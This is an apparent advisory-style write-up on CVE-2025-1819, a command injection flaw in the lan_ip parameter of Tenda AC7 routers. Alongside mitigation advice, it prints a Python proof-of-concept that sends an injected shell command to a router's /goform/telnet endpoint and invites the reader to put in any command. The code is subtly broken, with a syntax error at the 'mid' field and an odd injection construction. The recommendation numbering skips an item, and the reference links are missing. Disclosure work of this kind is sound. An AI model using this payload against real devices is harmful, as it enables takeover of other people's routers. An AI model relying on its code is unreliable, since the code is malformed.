CVE-2025-1819 - Critical Vulnerability in Tenda AC7 120M Routers Leads to OS Command Injection

Summary: A critical vulnerability, identified as CVE-2025-1819, has been discovered in the Tenda AC7 120M 15.03.06.44 router software. The vulnerability exploits the TendaTelnet function within the /goform/telnet file and could enable remote attackers to inject malicious OS commands.

Details

Tenda routers are popular around the world for their affordability and ease of use. However, it has recently been discovered that a serious vulnerability exists within the Tenda AC7 120M, specifically the 15.03.06.44 version. This vulnerability has been classified as critical and has the potential to impact thousands of devices.

Affected routers contain a flaw within the TendaTelnet function of the /goform/telnet file. The core issue is the manipulation of the "lan_ip" argument, which enables OS command injection, giving attackers the ability to control the target device remotely.

An attacker could leverage this vulnerability to perform a variety of malicious activities, such as stealing sensitive information, controlling network traffic, or distributing malware to connected devices. The exploit has already been disclosed to the public and may be used by cybercriminals in the near future.

The following code snippet illustrates the vulnerability in the Tenda Telnet function

import requests

def exploit(target, lan_ip):
    url = f"http://{target}/goform/telnet";
    payload = {
        "op": "start",
        "start": 1,
        "mid": ,
        "wan_ip": "",
        "lan_ip": lan_ip,  # Here the malicious OS command can be injected
        "ntp_status": 1,
        "LedStatus": 1,
    }
    response = requests.post(url, payload)
    return response.status_code

if __name__ == "__main__":
    target = "192.168.1.1"  # Target Tenda Router IP
    os_command = ";ls;"  # Replace this with the desired OS command to execute on the target router
    lan_ip = f"$(echo {os_command})"
    exploit(target, lan_ip)

Original References

1. The detailed vulnerability disclosure can be found at the following link: CVE-2025-1819
2. A security advisory from the vendor regarding the vulnerability, including recommendations, can be found here: Tenda Security Advisory

Exploit Details

As mentioned earlier, attackers can remotely launch the exploit by manipulating the lan_ip argument within the TendaTelnet function. As the exploit is publicly disclosed, attackers can take advantage and launch remote attacks on affected devices. It is thus critical for users of Tenda AC7 120M routers to apply patches and follow security recommendations as quickly as possible.

Here are a few recommendations to mitigate the risk

1. Update the Tenda AC7 120M firmware to the latest version as soon as possible: Tenda Firmware Update
2. Change the default credentials for the router admin interface to a strong and unique username and password combination.

Regularly check for security updates and apply them in a timely manner.

4. Implement network segmentation to minimize the impact of a potential compromise of the affected device on the entire network.

In conclusion, this CVE-2025-1819 vulnerability poses a significant risk to Tenda AC7 120M router users, and it is essential to address this issue immediately to prevent cybercriminals from exploiting it. Stay up-to-date with security patches and follow best practices to ensure the safety of your connected devices.

Timeline

Published on: 03/02/2025 17:15:11 UTC